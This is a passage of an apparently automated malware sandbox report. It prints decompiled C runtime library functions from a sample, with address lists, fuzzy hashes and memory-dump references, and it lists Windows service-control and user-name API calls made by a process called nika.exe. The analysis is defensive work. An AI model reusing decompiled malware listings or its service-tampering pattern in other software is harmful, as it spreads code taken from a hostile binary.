															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00595506 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0059553A
__isleadbyte_l.LIBCMT ref: 0059556E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0059559F
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0059560D

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: a89455971297ad0c70b5595de6e10be46819d9e89f6bc92d211ffb4f69641f68
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: A831A031A10646EFCF22DF64D884ABE3FA6FF01310F168568E5658B1A2F730D960DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00593742 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00593768

Part of subcall function 0059358D: __fltout2.LIBCMT ref: 005935B9

__cftog_l.LIBCMT ref: 0059378E
__cftoe_l.LIBCMT ref: 005937C0

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 79597927873c96647b4d033249b82506ab904d0d63331748987f7ea6d0dd5e85
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: CF114BB200014AFBCF125FC5CC498EE3F62FB58354B598515FA2959131E236CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nika.exePID: 5316, Parent PID: 2188COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF9A5D41B10 Relevance: 2.0, APIs: 1, Instructions: 546
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32 ref: 00007FF9A5D41FD1

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: dc44b8baa6ac65786d95331cf26a26cc7025a223b3ceb3eb1ef2b6f10cd4e493
Instruction ID: ce0887cc1198b2ca9e520ec1e073f0df0e48e82485148fb1f6bbe47942161b80
Opcode Fuzzy Hash: dc44b8baa6ac65786d95331cf26a26cc7025a223b3ceb3eb1ef2b6f10cd4e493
Instruction Fuzzy Hash: 12F1E530618A4D4FEB68DF68DC467F977E0FB59710F00426EDC9EC7281DA74A9858B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D4077D Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FF9A5D40989

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2200bbbf0a2a3ce514fb1a0d4eca0f1a3f964a42dc56b9a846620e4ae27ee6c1
Instruction ID: 903625a1d43f7e721a8956f76c6659ac8367d25364a43b9b44bc9b0c0f5648cd
Opcode Fuzzy Hash: 2200bbbf0a2a3ce514fb1a0d4eca0f1a3f964a42dc56b9a846620e4ae27ee6c1
Instruction Fuzzy Hash: B7917130618A4D8FEB68EF28C8557E977E1FF59310F00416EE88DC7291CB75A985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D40C34 Relevance: 1.7, APIs: 1, Instructions: 211
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FF9A5D40D99

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 25076f3d79992d045421d3694b8d5bf430c2c4cdecd80999065eaadfd58401c6
Instruction ID: 1b3a4b36a3c5bfbe98487f4e07185871b1213f5e4cf95cc51e21a1fbd9b8d883
Opcode Fuzzy Hash: 25076f3d79992d045421d3694b8d5bf430c2c4cdecd80999065eaadfd58401c6
Instruction Fuzzy Hash: 6051E530618A4D4FDB58EF28C8467F977E1FB59311F10426EE88EC7292DF74A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D40B2D Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF9A5D40BFA

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b2c8f4b5aa5ea511bfe34045b5b428d3fb6d172370f2ee025e5c5add65bbbd6d
Instruction ID: 3ebcb932bf9e33dd5486df8352dd086bc657f532cf0e48aecdced165f6df736c
Opcode Fuzzy Hash: b2c8f4b5aa5ea511bfe34045b5b428d3fb6d172370f2ee025e5c5add65bbbd6d
Instruction Fuzzy Hash: 06319331908A588FDB28DF98D849AFABBF0EB55711F00416FD08ED7652DF706845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D4108A Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF9A5D41145

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6c4f54d94e560085d63a1f0a1a96004fd7a3dc1fcb8e426fa2797c3989c6f1b5
Instruction ID: 2a947094dca602d724d8c69354750c2319296ccf63ad696a341738874109eb85
Opcode Fuzzy Hash: 6c4f54d94e560085d63a1f0a1a96004fd7a3dc1fcb8e426fa2797c3989c6f1b5
Instruction Fuzzy Hash: B231063090DB8C8FDB0ADB6898157E97FF0EF57320F04429FD089C71A2DAA56856CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A5D41A1D Relevance: 1.6, APIs: 1, Instructions: 118
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FF9A5D41ACB

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 96252125aa659182346ae70207f778840cfc10a39b09eaaa97b75e57ca08ee7a
Instruction ID: 06372ff728ee9c2f3d23e5154f35f4c137aa7dae0f66768bd03702f708e61d58
Opcode Fuzzy Hash: 96252125aa659182346ae70207f778840cfc10a39b09eaaa97b75e57ca08ee7a
Instruction Fuzzy Hash: ED31C13090CA588FDB18DF98D849AF97BF0EB69711F04416EE08AD3252CB74A806CB91

Uniqueness

Uniqueness Score: -1.00%

